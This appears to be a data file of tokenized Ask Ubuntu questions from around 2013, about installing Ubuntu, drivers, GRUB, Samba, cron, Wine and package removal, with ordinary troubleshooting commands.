309694	change samba password from windows client	i set up a samba server on ubuntu 12.04 in a network with five clients running windows 7 . we 're not using a domain , just a workgroup . everything is working fine . is there a way users can change their samba passwords from their windows clients ? preferably not involving an ssh client but using a web-interface or even a native windows method . edit : using usermin for now . it works but it 's a bit overkill , i 'm curious if you know any more elegant solutions . edit 2 : contents of /etc/samba/smb.conf global section : [ global ] workgroup = myworkgroup server string = % h server ( samba , ubuntu ) dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d security = user encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user guest account = smbguest usershare allow guests = yes
309695	wallpaper refresh	i have this simple script , take a look at it please : # ! /bin/bash cd ~/earthwallpaper/ while [ 1 ] ; do counter=0 while [ $ counter -lt 60 ] ; do wget http : //www.opentopia.com/images/cams/world_sunlight_map_rectangular.jpg -o world.jpg temp= $ ( stat -c % s world.jpg ) if [ [ $ temp > 1000 ] ] then rm world_sunlight_wallpaper.jpg mv world.jpg world_sunlight_wallpaper.jpg break fi sleep 5 let counter=counter+1 done pcmanfm -- set-wallpaper=~/earthwallpaper/world_sunlight_wallpaper.jpg sleep 60m done it is downloading picture from web every hour , save file to disk and set up as desktop wallpaper . one file , same name . downloading and saving works fine , but refreshing wallpaper on desktop works only once - only first time . next hour it wo n't change . the picture is saved in some cache and the system wo n't change it even the file is updated , on the desktop i see only the picture downloaded first time . after system restart , the picture will change . so is it possible to refresh wallpaper on desktop which has the same name ?
309696	run a script on startup to periodically disable the keyboard	i have the following script while [ true ] do gnome-screensaver-command -l xinput set-int-prop 10 `` device enabled '' 8 0 sleep 1m xinput set-int-prop 10 `` device enabled '' 8 1 sleep 30m done i want to run it on startup . i have really bad neck pain so doctor suggested me to go for a walk or do minor exercise every 30 minutes or so . i created this script which will lock me out and disable mouse for one minute . i also want to add keyboard disabling which will totally lock me out of my computer for a minute . it would be really amazing if there is any better option for this .
309704	what licenses am i allowed to use when selling ubuntu wallpapers ?	i am making debian packages containing wallpapers that i want to sell through canonical ( https : //myapps.developer.ubuntu.com/dev/ ) . canonical does not ( that i have found ) list allowed licenses for wallpapers that are to be sold through canonical . what licenses are permitted for wallpapers to be sold ?
309712	fatal error in installing git	i am trying to install git for ubuntu 12.04 , but running the git commands is giving me the following error message : cloning into 'neha ' ... fatal : bad config file line 1 in /root/.gitconfig using the article how to install git on ubuntu 12.04 as a reference and even after changing the gitconfig file , i still get the same error . besides , i can not directly open and change the gitconfig as it is in the root folder with an alert saying you ca n't view the files ! . can anyone help me as i am a newbie to linux , and ca n't get much help ?
309717	move dropbox-client appindicator	i know , that it 's possible , to re-arrange the ordering of the appindicators in the tray ( this question has been asked a few times ) /usr/share/indicator-application/ordering-override.keyfile and i know that it 's possible to get the name of the different appindicators via this qdbus command : qdbus -- literal com.canonical.appmenu.registrar /com/canonical/unity/panel/service com.canonical.unity.panel.service.sync | sed -e 's/ [ ^ { ] * { \ ( . *\ ) } \ ] /\1/ ' | sed -e 's/\ [ [ ^ '' ] */ [ /g ' | sed -e 's/\ [ \ ( \ ( \ ( `` [ ^ '' ] * '' \| [ ^ , '' ] *\ ) , \ ) \ { 4\ } \ ) [ ^ ] ] * , \ ( [ ^ , ] *\ ) \ ] / [ \4 , \1 ] /g ' | sed -e 's/\ [ \ ( [ ^ , ] *\ , \ ) \ ( `` [ ^ '' ] * '' , \ ) / [ \1\2 /g ' | sed -e 's/\ [ *\ ( ... . , .\ { 24\ } \ ) */ [ \1/g ' | sed -e 's/\ ] , \ [ / ] \n [ /g ' | sort -n -k2 my problem is : the dropbox-client changes it 's name of the appindicator ( always `` dropbox-client- '' and a random ( ? ) number ) . is it nevertheless possible to move the dropbox-appindicator ( something like getting the number beforehand , and changing the file with a bash script ? ) thanks
309719	google earth can not be installed on ubuntu 12.04 as it needs ia32-libs , but this can not be installed for unmet dependencies	downloading google earth 7.0 and the attempting to install with sudo dpkg -i google-earth-stable_current_amd64.deb results in this error message : ... dpkg : abhängigkeitsprobleme verhindern konfiguration von google-earth-stable : google-earth-stable hängt ab von ia32-libs ; aber : paket ia32-libs ist nicht installiert . dpkg : fehler beim bearbeiten von google-earth-stable ( -- install ) : abhängigkeitsprobleme - verbleibt unkonfiguriert ... trying to install the missing dependency ia32-libs results in further missing dependencies : sudo apt-get install ia32-libs ... probieren sie »apt-get -f install« , um dies zu korrigieren : die folgenden pakete haben unerfüllte abhängigkeiten : ia32-libs : hängt ab von : ia32-libs-multiarch e : unerfüllte abhängigkeiten . versuchen sie »apt-get -f install« ohne angabe eines pakets ( oder geben sie eine lösung an ) . applying apt-get -f install is of no help . trying to install ia32-libs-multiarch results in further missing dependencies , and so on . i understand that ia32-libs-multiarch may not be needed anymore , but since google earth insists on having it , what can be done ?
309727	cd not dvd installer	i want to install ubuntu on a pc that wo n't boot from usb sticks . i do n't have any blank dvds . is there something that will fit on a blank cd ?
309730	connect to another proxy through squid	i have an https proxy outside which uses username/password for authentication and i want to configure squid on ubuntu 12.10 to direct all connections which are not in it 's cache to that proxy . how can i do that ?
309733	time problem , my clock is completely wrong	i am in bangkok at the present , and the time here is 9.44pm tue 18-6-2013 but my clock show as 7.33pm wed 19-6-2013 what 's wrong with my clock ? i have spent a lot of time trouble shooting with utc configure , but it seems like not the same problem as i have got . i set the timezone as bangkok . i installed ubuntu alongside windows 8 ( *the clock in win8 is wrong as well , showing the same time as ubuntu . how do i fix it ? thank you in advance .
309736	ubuntu 13.04 keeps disconnecting from my router	my system keeps disconnecting from the network and then i have to turn wireless of and back on to make it connect again , this happesns quite often altough not at a regular interval . i am using ralink corp. rt5390 wireless 802.11n 1t/1r pcie any way i could fix it ?
309740	ubuntu 13.04 not booting . monitor stuck in idle mode	i downloaded the new version and tried to install from usb , but all i got was a black screen which hung till i powered off my desktop . also tried booting a live cd . but same problem , it does n't display anything , just sits idle with a black screen . any suggestions on what i should do next ?
309741	turn startup disk creator usb into primary drive	i used startup disk creator to creatr a usb drive and now i want to use it as a regular parition . is there a way just to turn it into a regular drive ? i want to install ubuntu on the same drive i have the installer iso on .
309743	having error message while using the `` sudo nautilus '' command in terminal	i am using ubuntu 12.04 lts ( 32 bit ) . when i run `` sudo nautilus '' command in the terminal , this output appears : tushar @ tushar-g41m-combo : ~ $ sudo nautilus [ sudo ] password for tushar : initializing nautilus-gdu extension nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . but still i can edit the folders and files in the `` file system '' . after closing the window this output appears in the terminal : tushar @ tushar-g41m-combo : ~ $ sudo nautilus [ sudo ] password for tushar : initializing nautilus-gdu extension nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . shutting down nautilus-gdu extension tushar @ tushar-g41m-combo : ~ $ what is the reason for this error message ? why with `` failed '' and `` error '' ? how to fix this error ?
309744	i need to install a epson tm-u950 printer on ubuntu 12.04 lts	i need to know how to install an epson tm-u950 printer on ubuntu 12.04 lts , i have been searching for around 3 months now . can anybody help please ?
309753	set internet connection priority	when i 'm connected to internet using wifi ( to an access point ) and usb 3g modem , ubuntu always set the 3g modem and consuming my valuable 3g data plan , no matter which one i connect to first . how do i set ubuntu to use wifi as default and only use 3g modem as backup in case wifi access point ca n't connect to internet ?
309756	how to install wubi without administrator privileges in windows	is there any way to install wubi without administrator privileges in windows ? or , if this is not possible , is there any workaround to have an ubuntu experience while on windows ? thanks .
309765	automating duplicity backups using cron	how do i automate duplicity backups using cron using gpg encryption and the ssh backend ?
309768	local host forbidden apache2	server version : apache/2.2.22 ( ubuntu ) server built : mar 15 2013 14:02:11 my error : /var/www $ ls -l total 36 -rw-r -- r -- 1 root root 23 جون 18 09:08 1.php -rw-rw-r -- 1 rehan rehan 0 جون 18 09:13 httpd.conf -rw-r -- r -- 1 rehan rehan 138 جون 15 12:18 indexfile.txt -rw-r -- r -- 1 rehan rehan 177 جون 15 12:18 index.html -rw-r -- r -- 1 rehan rehan 43 جون 15 12:18 metafile.txt -rw-r -- r -- 1 rehan rehan 650 جون 15 12:18 p1.pl -rw-r -- r -- 1 rehan rehan 261 جون 15 12:18 p2.pl -rw-r -- r -- 1 rehan rehan 870 جون 15 12:18 p3.pl -rw-r -- r -- 1 rehan rehan 89 جون 15 12:18 processsearch.php -rw-r -- r -- 1 rehan rehan 150 جون 15 12:18 searchengine.php
309770	terminal app on ubuntu touch nexus 4	i want to install the terminal app on ubuntu touch . when i ssh to the nexus4 device and run sudo apt-get install terminal i get this error . sudo : no tty present and no askpass program specified
309774	is there a caching dns proxy i can add local records to ?	i have a fairly standard adsl connection . modem/router with several computers inside . i would like to formalise some dns entries so that when inside the network some legal dns entries like server.myrealdomain.com resolves to a local ip . sidebar : the point of this is that when inside the network , devices will pick up the internal ips and when outside the network , they 'll be routed through the legal ip address and port-forwarded to the correct computer . if you think i 'm approaching the problem the wrong way , tell me ! i know i can tell the router to point to my internal server for dns , i 'm just left with the choice : which dns server should i use ? it has to support upstream dns ( configurable ) , be lightning fast ( as all queries on the network will shoot through this ) but be easy enough to add overrides to . what are my choices ?
309782	ubuntu 12.04 fails modprobe tainted	i just installed ubuntu 12.04 32 bit on an old laptop and i am getting errors - black screen with many lines of text . pertinent one appears to be modprobe tainted with a lot of debugging info - registers , stack , and call trace . i would post it but i am not sure where it is located and how to extract it .
309786	llvm and clang installation on ubuntu	so i 'm trying to install halide on my ubuntu 12.04 ( 64bit ) . i need llvm-3.2 and clang to be installed . running sudo apt-get install llvm-3.2 ends up with 'package not found ' . trying sudo apt-get install llvm or sudo apt-get install clang installs 2.9 versions . google helped me with this sudo add-apt-repository ppa : kxstudio-team/builds sudo apt-get update now , sudo apt-get install llvm-3.2 clang-3.2 works . but when i run make in halide folder i still get clang : command not found .
309789	ubuntu 12.04 server install fails with debootstrap warning	have made several attempts to download and create iso on cd and usb of 12.04 server 64-bit . install attempts on a few different machines always hits several `` debootstrap warning - `` ... ... deb file was corrupt '' errors . iso passes md5checksum
309790	how to restart networking ? eth0 rj45 does not connect after sleep mode in xubuntu 12.04	after i sleep down my notebook ( xubuntu 12.04 ) and wake up , my network setting goes often corrupted and does not work . only solution seems to be restart . connecting and disconnecting in network manager or sudo ifconfig eth0 down and later up does not help . sometimes the rj45 connector is blinking , sometimes not even that . occasionally other network cards ( wifi ) gets jammed similarly , but i do not use them so often and i do not know if this is the same problem . i 'm running a virtualbox windows 7 bridged to both network interfaces , do not know if there is some glue to that problem . is there a way how to completely init the network module in case this happen ? edit : using the responses bellow i have discovered , that nothing from sudo service networking restart or /etc/init.d/networking restart helped to bring the network card alive , once it gets `` dead '' . sometimes , the card is not even blinking like it would be disabled . sometimes card is blinking , but no response , no ip address is assigned . only solution is to switch notebook off and on again . could it be a hardware problem ? i have little comparison with dual-booted windows , but it happens so rarely , that i had no opportunity to observe it on different os .
309794	is it okay to use multiple package managers ?	with ubuntu ( or other versions of linux ) is it problematic to use different package managers at the same time ? as in , will it cause me grief if i install some programs using apt-get and others using synaptic ? i 've been doing this for years without incident , but i 'd appreciate some reassurance from someone more knowledgeable than myself .
309795	getting grub problem on my new laptop with preinstalled ubuntu software and just cant sort it out	got new laptop with preinstalled ubuntu.but now i m getting few lines as gnu grub version 1.99-21ubuntu3.1 minimal bash-like line editing is supported.for the first word tab listspossible command completions.anywhere else tab lists possible device or file completions . grub > dont konw what to do.. help ?
309796	what is the dialog box used by the ubuntu server installer ?	a dialog box displays user-friendly boxes from shell scripts . i 'm looking for the dialog box used in the ubuntu server 13.04 installer . i know a couple of alternatives but they do n't fit what i need . any ideas ?
309799	uninstall wine or other programms ( software ) from ubuntu	how can i uninstall wine or other programm ( software ) from ubuntu 12.04 ? i removed it from center , but it was not delete from menu
309802	ubuntu is 13.04 slower than 12	i 've been using ubuntu for quite a while now , mostly 12 . i recently updated to ubuntu 13.04 and the most noticeable change is that it 's overall slower than 12 . in particular , moving windows on the screen is very jerky . i tried several `` graphics card driver '' options , including downloading the graphics card driver directly from the nvidia website without success . do you have any idea about how to solve this ?
309804	is windows still running in the background ?	running 13.04 on a dual boot , is windows 7 still live and hackable from the outside world ? i put 13.04 on a separate 'drive'
309812	how to remove ubuntu from my windows 7 ?	i have a windows 7 pc but ubuntu does not allow me to go to a normal windows screen so i want to remove ubuntu from my pc .
309813	how to have ubuntu chrome canary ?	ubuntu how can i have google chrome canary ? https : //www.google.com/intl/en/chrome/browser/canary.html
309815	flash with 12.04 lts	i understand this question has been asked so many time and believe me i have searched high and low for an answer to my problem . but anyways , i am unable to get flash player to work . does n't matter what browser i use or what method . i have tried just downloading it from the sc , i have tried unpacking it and just copying the to the plugin directory , i have tried flash-aid for firefox and i have n't found any other method . the system i 'm using is an old single core , 32 bit amd cpu and a radeon 9200se graphics card . i am just using it as a smb server for my house . even so , i would really like to sort the flash problem . if anyone has any other ideas or another method i 've missed , it would be most welcomed .
309819	installation of ubuntu without formatting c drive	i am using windows 7 and now i thought of installing ubuntu . so my question is : i want to install ubuntu in the same c drive without formatting it as we can install windows 7 without actually formatting windows xp by simply just upgrading . is there any feature available like that ? summmary : i need to install ubuntu without formatting my hard disk and please note i do n't want to have a dual os .
309822	new to ubuntu/linux installed precise then upgraded to 13.04	after i installed 12.04 lts from scratch ( meaning no other os installed on system ) i wanted to upgrade tp 12.10 so i can continue on to 13.04. after booting up after upgrade it will not boot into graphical interface but i can get to terminal . i do n't know commands to update the video drivers ( this is what i suspect the problem is ) any help for a lifetime windows curmudgeon now finally seeing the light that there is more to life then starring through windows , would be very much appreciated . would like to add that i after logon sudo nautilus with response of could not open x display could not parse arguments : can not open display system is a dell gx-620 desktop
309827	how to manage kernel upgrades	i 'm using 12.04lts . last week i upgraded to the latest ( at the time ) kernel , 3.2.0.48 and my display system became completely unusable . i have two displays on an nvidia video adapter . i suspect the abi changes in this kernel made the nvidia proprietary drivers not work . i could only get my system back by a fresh install . ( with my work directories all on another hard drive , i can re-install and be running again in about an hour ) . i 'm now at kernel 3.2.0.29 after my initial upgrade . the updater indicates it needs to upgrade to .48 , but i know there are interim kernels . my question is about the apt-get upgrade process with kernels . does this always only advance one kernel ? that seems to be the case , but do n't know if there are exceptions . i 'd like to do my upgrades and get to 3.2.0.45 which is the last one that worked for me . then wait for nvidia and/or kernel updates that allow me to go further .
309828	kernel panic - json_object_array_length	so , i get kernel panic on boot now . it says /sbin/init : symbol lookup error : /sbin/init : undefined symbol : json_object_array_length attempted to kill init blah blah i blame the json-c ( https : //github.com/json-c/json-c ) library i installed just before the last reboot cycle . recovery mode obviously does n't work . fs is rw mountable and works . any ideas how to fix this without reinstalling the system ? thanks !
309834	missing new file in ubuntu 13.04	the new file operation is missing in ubuntu 13.04 . how can i fix it ? i have only `` new folder '' . how can i add the new file option again ?
309835	limiting to two workspaces in raring ?	i want to use just 2 workspaces in my raring install , instead of the default two rows of two workspaces each . is there a way to do so without using compiz ?
309841	install a program from a package ?	i downloaded a sqlite browser , but it 's simply left as a package in my downloads . i 've extracted it so now what do i do to install it as a program ? new to ubuntu and linux , thanks . using 12.04 lts i realize this is a pretty basic question but i 've looked through several other questions and have n't quite found the same thing answered .
309851	how to enable javascript ?	both gmail and chrome browser tell me i need to enable javascript . how do i do this . did not find anything in software center .
309853	getting output from a cron job on the terminal	i have a program that prints some output that i would like to pop up on my terminal once every hour during the workday . $ crontab -l 0 07-17 * * * /home/dat/scripts/cron.out syslog reports the following : ( dat ) cmd ( /home/dat/scripts/cron.exe ) jun 18 12:02:01 picard cron [ 10848 ] : ( cron ) info ( no mta installed , discarding output ) what am i missing ?
309856	what does this output in syslog mean ?	there is this output every passing minute - one time - in syslog : cron [ 15164 ] : ( root ) cmd ( /usr/bin/test -x /usr/sbin/autodns-dhcp_cron & & /usr/sbin/autodns-dhcp_cron ) what does this mean ?
309857	dvd movie not working	i have ubuntu 12.10 and i ca n't play dvd movies . i tried every kmplayer vlc gnomevlc could not read the file ( input/output error ) . file reading failed : vlc could not read the file ( input/output error ) . file reading failed : vlc could not read the file ( input/output error ) . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///media/ahsidddiqui/ubuntu % 20oem % 2012.10 % 20amd64 % 20ualinux/ ' . check the log for details . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///media/ahsidddiqui/ubuntu % 20oem % 2012.10 % 20amd64 % 20ualinux/ ' . check the log for details .
309866	no install button on ubuntu software centre	hi i got a cd from a friend with linux operating systems on . i chose ubuntu . not sure which version but he said he got the cd on a magazine last year . when i go to software centre to install software i cant install anything because ther is no install button . only buttons for the ones you have to pay for . can you please help me ? this is my first time using ubuntu and i really like it accept for this problem because i need to install plugins in order to play videos . thanks andrew
309868	how can i set the correct screen resolution ?	i originally installed ubuntu then changed to lubuntu because i have a 1 ghz cpu and .5 gigs of ram . lubuntu detects my hd monitor to be 16:10 , and it cuts of a little bit of the screen ( half the scroll bar ) . i need 16:9 resolution .
309872	printing on hp officejet 6700	i have hp officejet 6700 printer . i have been able to print some documents ; but now , i could not print again . when i try to print , it looks like the printer stored the document to be printed into memory . after a while , even when the printer is on & off , when i wanted to print another document , the previous document will print and stop . i am not sure how long it will take to respond to the next print instruction . right now , printing is at a stand_still . can i get help please ? ? i have documents on my system that i must print out . thanks .
309873	desktop wo n't load up	let me start off by saying that i am a complete newbie of all things linux . i have an old ibm thinkpad t30 i wanted to install and learn up . i downloaded the 32 bit version of ubuntu 13.04 . i installed it and everything was looking good . the problem comes in after i login . the screen becomes grainy and i do not see anything icons/menu , etc on the desktop . the same background picture looks good on the disk install screen . i would have thought if this were just a video card issue the signin screen would be high quality and i would see something kind of icon or menu on the desktop . as a side note , i do notice when i enter in the command prompt i see `` welcome to ubuntu 13.04 ( gnu/linux 3.8.0-19-generic i686 ) '' â could that mean i downloaded the 64 bit version even though it was labeled as the 32 bit version ? any thoughts ? computer : ibm thinkpad t30 video : ati mobility radeon 7500 processor : mobile intel ( r ) mobile pentium ( r ) 4 processor-m wireless : hawking technology ( working fine ) computerâs detailed specs : http : //support.lenovo.com/en_us/detail.page ? legacydocid=migr-58227
309874	how to install linux kernel 3.9 in ubuntu	how to install linux kernel 3.9 in ubuntu
309881	what 's the best operating system for old computer ? linux	i have very old computer what 's the best operating system for old computer ?
309885	two ubuntu one cloud icons in the top bar	edit : i did some digging around and it turns out that the command provided before was incorrect . here is the command you 'll need to get rid of the old ubuntu one icon : sudo apt-get purge indicator-ubuntuone after that , once the computer is restarted , only the new ubuntu one icon will remain up there in the top bar . the problem is now fixed . i recently upgraded my 12.10 to 13.04 and i noticed that my top bar now holds two ubuntu one cloud icons . i searched around on the internet and came up with a question that resembled mine . however , i tried dobey 's method : inputting sudo apt-get purge ubuntuone-indicator in the terminal , thus removing the package , and then restarting my system . that , however , held no results , as there are still two ubuntu one cloud icons up there ( as shown in this image ) . does anyone know what can be done to remove the first ( `` grayed out '' ; old ) ubuntu one cloud icon ? just note that very much like the question in which i found the above command , those two icons are for ubuntu one . neither of them belong to ubuntu one music . many thanks ! ps : i do n't know if it may be of assistance or not , but my ubuntu 12.10 did not show the ubuntu one cloud icon up there ( even though it was supposed to in the u1 configs ) , so i used the command ( for 12.04 ) shown here to get it to appear on my top bar .
309886	autorun .exe files with wine	i am using wine to run several windows-only games that i play . currently , in order to play the game , i must locate the file in nautilus , right click , and open with > wine . if i lock the .exe file to the launcher , then try to run the wine icon , then nothing happens . if i copy the .exe shortcut to the desktop , then i lose the option to right click & open with wine . what i would like to be able to do is simply designate all .exe files to automatically open ( on double left-click ) with wine . i 've searched through other questions here and other sites and have been unable to find an answer , so any help is greatly appreciated .
309890	text/log viewer that that will allow filtering by words/phrases ?	i 'm looking for a gui-based text/log viewer that will allow to only display lines that contain particular phrases/words/characters . the logs may not necessarily by os related but from 3rd party applications .
309896	how do i detect my gpu after fresh install ?	sorry if this has been asked already , i 've checked all over but did n't find anything related to my problem ( at least specifically , also , i 'm a newbie ) . anyway , here goes , i recently had to reinstall ubuntu ( 12.04 ) after some tragic mishaps . i reformatted the hdd and everything , install ran without a hitch , but upon logging in , my system ca n't seem to detect or locate my geforce 560gtx card . what can i do and what other information do i need to put up ? also , what are the commands to access them ?
309897	how do you fix the grub rescue	i deleted the ubuntu partition via windows and was going to use an usb to re download and install it . but when i restarted the computer the unknown file system and grub rescue screen came up . now , i ca n't even start up windows . i 'm just stuck on the grub rescue screen and i have no idea how to fix it and i 'm a complete beginner .
309900	installing java 7 update 25 on 12.04 lts ?	how can i install java on ubuntu 12.04 ? i have : java ( tm ) se runtime environment ( build 1.7.0_21-b11 ) java hotspot ( tm ) 64-bit server vm ( build 23.21-b01 , mixed mode )
309902	how do i uninstall google earth	i installed google earth on an older computer and discovered after i installed it that the graphics card will not support it . i want to uninstall it but it does not appear in ubuntu software centre
309911	directory appearing as file ?	so we copied some photos in a directory across to a ntfs partition last night , and they were viewable from ubuntu . today the directory is not accessible from windows , and when we booted back into linux , the directory appears as a file and nautilus thinks its a gzip archive . ls -la gives the following : -rw -- -- -- - 1 kim kim 16769 jun 17 22:47 directoryname my assumption is that the `` directory '' and its pointers to the other files are still there , it just has the wrong attributes . i tried sudo chmod a+rwx directoryname but this did n't have any affect . any ideas how i can convince my directory that its a directory again ? ? or otherwise recover the files that are now orphaned on the drive ?
309914	ati mobility radeon hd 450	i 've just instaled ubuntu 13.04 on vaio with ati mobility radeon hd 450 , now i need help with instaling drivers for this graphics
309916	removing transmission bit torrent client	simply want to remove this client , do n't really like it . ca n't figure out what packages it 's installed as , tried both transmission and transmission-daemon , the first not being anything and the second states it 's not installed . running ubuntu 13.04 , all updated . just do n't like having programs i do n't use/want to use deluge .
309917	is ubuntu the operating system or is linux considered the operating system ?	i realize ubuntu is built atop linux source , including the gui perspective using x , etc . it is a lightly abstracted deviation of a standard linux protocol gui-based os in that it does n't natively differ from desktop linux , such as how android does without native x support implemented . however , when referring to a linux distro , such as ubuntu , should one refer to ubuntu , the kernel software part and the originating source , or should one refer to ubuntu , the software on top of linux ? because it is all confusing saying i have `` linux on my desktop '' and `` i have ubuntu on my desktop '' , which can be essentially the same thing when you really consider it and break away the middleware .
309925	my tv has been detected as a laptop	i installed ubuntu 13.04 today and had issues with overscanning/underscanning on my tv connected with hdmi . i have a sapphire hd 4765 graphics card so i tried to install the amd driver to control this . after i restarted my pc the desktop was really zoomed and there was no utility on display , when i looked at the display settings it showed that the tv was detected as a laptop screen but i could not change any of the settings within the display configuration . please help thanks .
309926	connection failing on openjdk-7-jre	i am trying to install openjdk-7-jre on a 64bit ubuntu 12.04 server as part of a canvas lms install . when i run sudo apt-get install openjdk-7-jre i get : err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe openjdk-7-jre-headless amd64 7u21-2.3.9-0ubuntu0.12.04.1 connection failed this error is repeated for security.ubuntu.com at two separate locations i have tried using the -- fix-broken flag as this was suggested at the first failure , but this has not resolved the issue . i have installed multiple other packages with no issues , this leads me to believe the i do not have a connectivity issue to the internet or to the repository . i have run both the apt-get update and the apt-get upgrade with no problems . any suggestions as i am unable to complete the lms install without this package .
309929	stopping forwarding a dynamic port mid session	when connecting to a server , i can open a port forward midway though by enter ~c -d 8080 when it comes to closing that forward though im a bit lost the docs say it also allows the cancellation of existing remote port-forwardings using -kr hostport . but when trying that the forward survives . trying -kd and -kl with port 8080 also dont kill it . what is the best way to stop a forward mid session ?
309930	battery indicator not showing up on ubuntu 13.04	so i have tried many different solutions and researched everywhere on what could fix this issue . the battery is set to be appearing in the power settings and dconf settings . this has been leading to many unexpected shutdowns . any idea of how to fix it ?
309931	possible performace bug	i have noticed a bug in 13.04 when i minimize something i press the minimize button it doesn’t want to minimize or will start to hang and wo n't go anywhere until i press ctrlaltdel in three different laptops that i tried ubuntu in it did the same thing and also happened . i would like an step by step instructions on how to run an install file with the chmod things because i am trying to install a program called cool vl viewer for second life and the page doesn’t give me a guide to install . i 'm just asking about the bug because i don’t know if anyone else has experienced it and also asking how to install that program .
309934	ca n't install pinnacle studios 14 on ubuntu	i 'm trying to install pinnacle studio hd version 14 on my laptop , and i 've already downloaded wine and when i insert the installation cd , i can run the exe file . however , once that 's all done with , nothing happens and it 's like i have n't even downloaded it and i have to do it again . and again , but nothing happens still . anything i 'm missing ?
309940	resource usage between 12.04 lts , 12.10 and 13.04	i 've finally decided to use ubuntu for my dev machine . however my question is what ubuntu is really suited for my tasks . what i am generally looking for who has less resource usage , ubuntu 12.04 , ubuntu 12.10 or 13.04 who 's more stable ? ubuntu 12.04 ubuntu 12.10 or 13.04 i will be primarily using this os for developing web applications ( java ee , scala and ruby ) who use less resouces ( cpu and ram ) ? ubuntu 12.04 ubuntu 12.10 or 13.04 ( a benchmark would also really help and who boots faster ) my system specifications amd apu a6 dual core 2.7ghz 8gb of ram updated the question i did n't know that there 's a newer version of ubuntu . so i added and updated my question
309943	what are good torrent clients that are compatible with ubuntu ?	are there any good torrent clients that are compatible with ubuntu ? most of the main ones ( bittorrent , utorrent ) are only for windows and mac .
309946	hard drive allocation	can i change the amount of hard drive space i have allocated to ubuntu later after i have installed it ? i 'm not sure how much i should allocate as i wont be putting many big files on it ... how much would you recommend if i have 2tb/windos7
309951	listen port 80 - watching received requests - apache	i have a server ubuntu 12.04 with apache installed . i wonder if is there a way to watch , in real time , in the terminal , the requests received on port 80 . thank you .
309959	screen needs to be shifted	my screen is shifted over to far to the right . it turns out there is a blank part on the left of the screen , and scroll bar cut off on the right . i cant find anything on my monitor for shifting it . so i think its on my pc instead . thanks
309966	difference between `` ppa-purge '' and `` add-apt-repository -r '' ?	what is the main difference between ppa-purge and add-apt-repository -r. which one better clear residual items and reason to use one over another ? does add-apt-repository -r should do what ppa-purge do ? edit : also do both remove key from apt 's keyring ?
309968	installing ruby on rails stack on ubuntu ?	i 'm looking to install ruby on rails on ubuntu similarly to how its described in the railsintaller.org for mac/windows . instructions and guides that i 've seen to do this on ubuntu seem to be all over the place and everyone seems to have their own way as to how to do this . i 'm a ubuntu newbie and would like this as simple as possible if it can be done . does anyone have a guide/video/tutorial they recommend ? . what rubyinstaller.org download installs it ? and what i would like to get installed as well is : ruby rails bundler git sqlite tiny tds/osx gcc installer/ ubuntu equivalent jewelry box rvm sm framework
309971	touchpad does n't respond when power is pluggged	upon upgrading ubuntu 11.04 through 12.04 on a dell system , the touchpad does n't respond until the power plug is unplugged . any idea why ? to better clarify the behaviour of the touchpad : the touch pad moves in slow motion when the power is plugged otherwise , it works perfect .
309974	installation of ubuntu from usb flash drive	i have gone through the online instructions for installing ubuntu from a usb flash drive . so it says first that i have to download ubuntu in order to install it from flash drive . so i downloaded the software . it is a file of type .iso . so what do i do with this .iso file ? how to prepare my usb flash drive so that i reboot and install the ubuntu ? any help is much appreciated .
309975	no audio/sound in ubuntu 13.04	issue : no sound comes from built-in speakers and headphone jacks after doing a clean install of ubuntu 13.04 setup : dual-boot with windows vista home basic ( used mainly for adobe cs ) audio : intel hda chip : conexant cx20561 ( hermosa ) here 's what i get when i run [ code ] aplay -l [ /code ] in terminal : **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : conexant analog [ conexant analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : conexant digital [ conexant digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i 've already updated the alsa and pulseaudio drivers after the clean install , still no sound . caveat : no sound as well when logged into windows vista partition even if sound card/device is listed as installed and working properly in device manager . audio driver and bios has already been updated as an attempt to fix the issue . help !
309980	samsung uefi laptop wo n't boot from live usb ( preinstalled with windows 8	i have a saumsung 5 ultrabook preinstalled with windows 8 , and am looking to do away with windows completely , and install ubuntu ( so far i 've been trying with 13.04 64bit ) . i made my liveusb using lili , disabled secure boot , disabled fast startup , enabled booting from csm ( i tried the uefi and csm option as well as csm only ) , and changed the boot priority to go to my usb first . there where however 3 options , usb hdd , usb fdd , and usb cd . i did n't know which one to pick , so i put them all above the windows boot priority . despite all of this it always boots up windows . the green light does however flicker on my usb when it boots , it that helps at all . i 'm at a loss on what to do here , i 've tried following everything i can find online . does anyone have any suggestions ? note : this is getting marked as a duplicate question , but the question that it is apparently a duplicate of is asking about dual booting w/windows and the asker was able to boot from their liveusb . this is not my situation , so i do n't understand how this can be a duplicate .
309981	help with having windows 7 and linux on one laptop hdd ?	i would love to install ubuntu but i do n't want to lose windows 7 sp1 . i am really afraid to make a partition unless it 's a fresh hdd with nothing on it . ( new pc , etc ) anyone have a very detailed video or walkthrough ?
309991	trying to remove bluetooth , safe to do ?	i am running ubuntu 12.04 lts on a computer that has 0 bluetooth support , i wish to remove the options for it so my users do n't get confused or frustrated thinking the computer does have bluetooth when in fact it does n't . i did a grep and found the following packages : bluez bluez-alsa bluez-cups bluez-gstreamer gir1.2-gnomebluetooth-1.0 gnome-bluetooth libbluetooth3 libgnome-bluetooth8 pulseaudio-module-bluetooth are any of these packages of any system importance besides bluetooth comparability ? if i where to run the following command : sudo apt-get remove bluez* *bluetooth* would this be a safe command to run ? thanks~
309994	wireless broadband connnection ubuntu	for some reasons , i can not connect to internet on wifi , but i can connect to wireless broadband on windows , but i do n't know how to set it up in ubuntu 13.04 . my connection is a dsl cable that i have plugged in the wifi router . i have a username and a passoword . on windows , i could connect easily as it automatically recognized the broadband connection on my wifi . but i do n't know how to set it up on ubuntu . thank you .
